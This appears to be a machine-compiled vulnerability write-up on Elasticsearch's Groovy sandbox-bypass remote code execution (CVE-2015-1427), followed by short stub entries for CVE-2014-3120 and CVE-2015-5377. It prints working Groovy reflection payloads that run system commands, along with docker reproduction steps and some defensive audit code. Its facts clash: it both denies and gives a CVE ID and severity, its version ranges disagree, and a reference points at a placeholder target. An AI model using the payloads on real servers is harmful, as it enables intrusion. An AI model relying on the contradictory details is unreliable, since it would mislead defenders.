1. Vulnerability overview
1.1 Background
Early Elasticsearch versions supported Groovy scripts for flexible data processing and querying. The Groovy sandbox, however, could be bypassed, allowing an attacker to execute arbitrary system commands.
1.2 Summary (CVE ID, severity, vulnerability type, disclosure date, etc.)
| Item | Detail |
|---|---|
| Vulnerability ID | No unified identifier |
| Severity | No authoritative information found |
| Vulnerability type | Groovy script remote code execution |
| Disclosure date | No authoritative information found |
| Affected component | Elasticsearch security |
- Vulnerability type: Remote Code Execution (RCE)
- CVE ID: CVE-2015-1427 (sandbox bypass)
- Severity: Critical
- CVSS score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
- CWE ID: CWE-94 (Code Injection)
- Discovered: February 2015
Verification note: no single CVE identifier was found for this issue; this write-up combines the original text with public sources.
2. Affected scope
2.1 Affected versions
- Elasticsearch 1.2.0 - 1.4.2 (CVE-2015-1427)
- Elasticsearch < 1.3.8
- Elasticsearch 1.4.0 - 1.4.2
2.2 Unaffected versions
- Elasticsearch ≥ 1.4.3 (dynamic Groovy disabled)
- Elasticsearch ≥ 1.3.8
- Modern versions disable Groovy by default
2.3 Trigger conditions (specific modules, configuration, runtime environment, etc.)
- Dynamic scripting is enabled (`script.disable_dynamic: false`)
- The attacker can submit queries
- The target server has outbound network connectivity (used for a reverse shell)
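As an added example (not part of the write-up or of Elasticsearch), a Python audit routine that applies the version ranges from 2.1 and the configuration conditions from 2.3 to the body of a `_nodes/settings` response; the defaults it assumes for `script.disable_dynamic` and `script.groovy.sandbox.enabled` are assumptions, marked in the code.

```python
import json
import re

def parse_version(text):
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised Elasticsearch version: {text!r}")
    return tuple(int(x) for x in m.groups())

def version_affected(text):
    # Ranges listed in section 2.1 for CVE-2015-1427: below 1.3.8, and 1.4.0 to 1.4.2.
    v = parse_version(text)
    return v < (1, 3, 8) or (1, 4, 0) <= v <= (1, 4, 2)

def flatten(settings, prefix=""):
    """Turn the nested settings object of _nodes/settings into dotted keys."""
    out = {}
    for key, value in settings.items():
        if isinstance(value, dict):
            out.update(flatten(value, f"{prefix}{key}."))
        else:
            out[f"{prefix}{key}"] = str(value)
    return out

def dynamic_groovy_exposed(settings):
    # Assumption: dynamic scripts stay reachable unless script.disable_dynamic is
    # exactly 'true' (2.3 treats the default as enabled), and the Groovy path is
    # closed once script.groovy.sandbox.enabled is 'false' (the 1.4.3 default).
    flat = flatten(settings)
    if flat.get("script.disable_dynamic", "false") == "true":
        return False
    return flat.get("script.groovy.sandbox.enabled", "true") != "false"

def assess_nodes(nodes_json):
    """Map node id -> verdict for a _nodes/settings response body (JSON text)."""
    verdicts = {}
    for node_id, node in json.loads(nodes_json)["nodes"].items():
        vuln_version = version_affected(node["version"])
        exposed = dynamic_groovy_exposed(node.get("settings", {}))
        if vuln_version and exposed:
            verdicts[node_id] = "VULNERABLE: affected version and dynamic Groovy reachable"
        elif vuln_version:
            verdicts[node_id] = "AT RISK: affected version, dynamic scripting off by config"
        else:
            verdicts[node_id] = "OK: version outside the affected range"
    return verdicts

# Constructed sample in the shape of a _nodes/settings response (not real data).
SAMPLE = json.dumps({"nodes": {
    "n1": {"version": "1.4.2", "settings": {"script": {"disable_dynamic": "false"}}},
    "n2": {"version": "1.3.5", "settings": {"script": {"disable_dynamic": "true"}}},
    "n3": {"version": "1.4.3", "settings": {}},
}})
```

Feed it the output of `curl http://<host>:9200/_nodes/settings` to get one verdict per node.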
3. Vulnerability details and root cause
3.1 Trigger mechanism
Groovy scripts are used in Elasticsearch for:
- custom scoring
- aggregation computations
- document update operations
Attack chain:
malicious query → Groovy script execution → sandbox bypass → Java Runtime.exec() → system command execution
The sandbox bypass relies on Java reflection:
```groovy
// The sandbox blocks direct calls to Runtime,
// but reflection gets around the check
Class.forName('java.lang.Runtime').getRuntime().exec('id')
```
3.2 Root cause at source level (vulnerable code vs. patch)
Vulnerable code (simplified; an illustration of the flawed approach, not the actual Elasticsearch source):
```java
// GroovyScriptEngine.java (simplified illustration)
import java.util.Set;
import groovy.lang.GroovyClassLoader;
import groovy.lang.Script;

public class GroovyScriptEngine {
    // Flaw: a substring blacklist is the only barrier
    private static final Set<String> BLACKLIST = Set.of(
        "Runtime", "Process", "exec"
    );

    public Script compile(String scriptSource) throws Exception {
        // Sandbox check (flaw: the blacklist is incomplete)
        for (String forbidden : BLACKLIST) {
            if (scriptSource.contains(forbidden)) {
                throw new SecurityException("Script contains forbidden terms");
            }
        }
        // Compile the script with no class-loading or reflection restrictions
        GroovyClassLoader loader = new GroovyClassLoader();
        return (Script) loader.parseClass(scriptSource).newInstance();
    }
}
```
Problems:
- The blacklist approach is unsafe (bypassable via reflection)
- Java class loading is not restricted
- Reflective calls are not restricted
Bypass methods:
```groovy
// Method 1: reflection
java.lang.Class.forName('java.lang.Runtime')
    .getMethod('exec', String.class)
    .invoke(
        java.lang.Class.forName('java.lang.Runtime')
            .getMethod('getRuntime')
            .invoke(null),
        'whoami'
    )

// Method 2: string concatenation to evade the blacklist
def cmd = 'who' + 'ami';
Runtime.getRuntime().exec(cmd)

// Method 3: via ScriptEngine
new javax.script.ScriptEngineManager()
    .getEngineByName('js')
    .eval('java.lang.Runtime.getRuntime().exec("id")')
```
Fixed code (1.4.3+), shown as an illustrative sketch of the allowlist approach rather than the actual commit; the fix that shipped in 1.3.8 and 1.4.3 disabled the Groovy sandbox, and with it dynamic Groovy scripts, by default (`script.groovy.sandbox.enabled: false`):
```java
// GroovyScriptEngine.java (illustrative pseudo-code; parseAST is not a real API)
public class GroovyScriptEngine {
    // Allowlist of bindings a script may reference
    private static final Set<String> WHITELIST = Set.of(
        "doc", "params", "_score", "_source"
    );

    public Script compile(String scriptSource, SecurityManager sm) throws Exception {
        // Allowlist check on the parsed AST rather than on the raw text
        ASTNode ast = parseAST(scriptSource);
        validateAST(ast, WHITELIST);
        // Use a security manager
        GroovyClassLoader loader = new GroovyClassLoader();
        loader.setShouldRecompile(false);
        // Disable dangerous features (illustrative: the real CompilerConfiguration
        // call takes AST-transformation class names, not JDK class names)
        CompilerConfiguration config = new CompilerConfiguration();
        config.setDisabledGlobalASTTransformations(
            Set.of("java.lang.Runtime", "java.lang.Process")
        );
        return (Script) loader.parseClass(scriptSource, config).newInstance();
    }

    private void validateAST(ASTNode node, Set<String> allowed) {
        // Recursively validate the AST, permitting only safe operations
    }
}
```
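As an added example (not code from the write-up or from Elasticsearch), a token-level Python approximation of the allowlist idea behind the sketched `validateAST`: every identifier that starts an expression must be one of the allowed bindings, a Groovy keyword, or a local declared with `def`, so reflection, `Runtime`, and `new` are rejected without a blacklist. A production check would walk the parsed AST as the fixed code sketches; the regex pass here is an illustration.

```python
import re

# Bindings the write-up's fixed engine allows (section 3.2 WHITELIST). A "root" is
# the first identifier of a dotted chain, e.g. `doc` in doc['f'].value.
ALLOWED_ROOTS = {"doc", "params", "_score", "_source"}
# Groovy keywords and literals that may legitimately start an expression.
KEYWORDS = {"def", "return", "if", "else", "for", "while", "true", "false", "null"}
STRING_LITERAL = re.compile(r"'[^']*'|\"[^\"]*\"")
ROOT_IDENT = re.compile(r"(?<![\w.])[A-Za-z_]\w*")

def root_identifiers(script):
    """Identifiers that start a chain (not preceded by '.'); string bodies are
    removed first so class names inside quotes do not count as code."""
    stripped = STRING_LITERAL.sub("''", script)
    return [m.group(0) for m in ROOT_IDENT.finditer(stripped)]

def validate_script(script):
    """Allowlist check: every root must be a keyword, an allowed binding, or a local
    declared with `def`; anything else (including `new`) is rejected.
    Returns (ok, sorted list of offending roots)."""
    declared = set(re.findall(r"\bdef\s+([A-Za-z_]\w*)", script))
    permitted = ALLOWED_ROOTS | KEYWORDS | declared
    offending = sorted({r for r in root_identifiers(script) if r not in permitted})
    return (not offending, offending)

# Constructed samples: two legitimate scoring scripts and the three bypass shapes
# from section 3.2 (class names only; no command payloads).
SAMPLES = {
    "scoring": "doc['views'].value * _score + params.boost",
    "local":   "def w = params.weight; return _score * w",
    "reflect": "java.lang.Class.forName('java.lang.Runtime').getMethod('getRuntime').invoke(null)",
    "concat":  "def cmd = 'who' + 'ami'; Runtime.getRuntime().exec(cmd)",
    "engine":  "new javax.script.ScriptEngineManager().getEngineByName('js').eval('1 + 1')",
}

def check_samples():
    """Map sample name -> whether the allowlist accepted it."""
    return {name: validate_script(src)[0] for name, src in SAMPLES.items()}
```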
4. Reproduction (optional)
4.1 Environment setup
```bash
# Start an affected version
docker run -d --name es-groovy-rce \
  -p 9200:9200 \
  elasticsearch:1.4.2
# Confirm dynamic scripting is enabled (the default)
curl http://target:9200/_nodes/settings?pretty | grep script
```
4.2 PoC demonstration and testing
Basic command execution: (the PoC listing is truncated in the source; only the comment fragment "execute who" survives)
5. Remediation and mitigation
5.1 Official upgrade advice
- No authoritative information found; defer to the vendor's security advisory, fix commits, or release notes.
5.2 Temporary mitigations (configuration changes, disabling modules, WAF rules, etc.)
- Until the upgrade is complete, confine the service to a trusted network boundary and minimise its exposed surface.
- Take high-risk interfaces, plugins, and debugging features offline temporarily, and add access controls and log monitoring.
6. References
6.1 Official security advisories
- No directly citable official advisory found; refer first to the project's security announcements, release notes, and fix branches.
6.2 Other technical references
- http://target:9200/_nodes/settings?pretty
Elasticsearch Remote Code Execution Vulnerability (CVE-2014-3120)
1. Vulnerability overview
1.1 Background
This entry covers CVE-2014-3120 in Elasticsearch, rated HIGH (CVSS 8.1) and listed in the CISA KEV catalog.
1.2 Summary (CVE ID, severity, vulnerability type, disclosure date, etc.)
| Item | Detail |
|---|---|
| Vulnerability ID | CVE-2014-3120 |
| Severity | HIGH |
| CVSS score | 8.1 |
| Weakness type | CWE-284 |
| Disclosure date | 2014-07-28 |
| Affected component | Elasticsearch |
| CISA KEV | Listed |
| KEV name | Elasticsearch Remote Code Execution Vulnerability |
| KEV date added | 2022-04-15 |
2. Affected scope
2.1 Affected versions
elasticsearch:elasticsearch:*, < 1.2
3. Vulnerability details and root cause
3.1 Trigger mechanism
- NVD description: The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own inde...
3.2 Root cause at source level
- Weakness classification: CWE-284 (Improper Access Control)
6. References
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
- https://www.cve.org/CVERecord?id=CVE-2014-3120
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- http://bouk.co/blog/elasticsearch-rce/
- http://www.exploit-db.com/exploits/33370
- http://www.osvdb.org/106949
- http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce
- http://www.securityfocus.com/bid/67731
Elasticsearch Remote Code Execution Vulnerability (CVE-2015-5377)
1. Vulnerability overview
1.1 Background
This entry covers CVE-2015-5377 in Elasticsearch, rated CRITICAL (CVSS 9.8).
1.2 Summary (CVE ID, severity, vulnerability type, disclosure date, etc.)
| Item | Detail |
|---|---|
| Vulnerability ID | CVE-2015-5377 |
| Severity | CRITICAL |
| CVSS score | 9.8 |
| Weakness type | CWE-74 |
| Disclosure date | 2018-03-06 |
| Affected component | Elasticsearch |
2. Affected scope
2.1 Affected versions
elastic:elasticsearch:*, < 1.6.1
3. Vulnerability details and root cause
3.1 Trigger mechanism
- NVD description: Elasticsearch before 1.6.1 allows remote attackers to execute arbitrary code via unspecified vectors involving the transport protocol. NOTE: ZDI appears to claim that CVE-2015-3253 and CVE-2015-5377 are the same vulnerability
3.2 Root cause at source level
- Weakness classification: CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'))
6. References
- https://nvd.nist.gov/vuln/detail/CVE-2015-5377
- https://www.cve.org/CVERecord?id=CVE-2015-5377
- http://www.securityfocus.com/bid/75938
- http://www.zerodayinitiative.com/advisories/ZDI-15-365/
- https://discuss.elastic.co/t/elasticsearch-remote-code-execution-cve-2015-5377/25736
- https://github.com/elastic/elasticsearch/commit/bf3052d14c874aead7da8855c5fcadf5428a43f2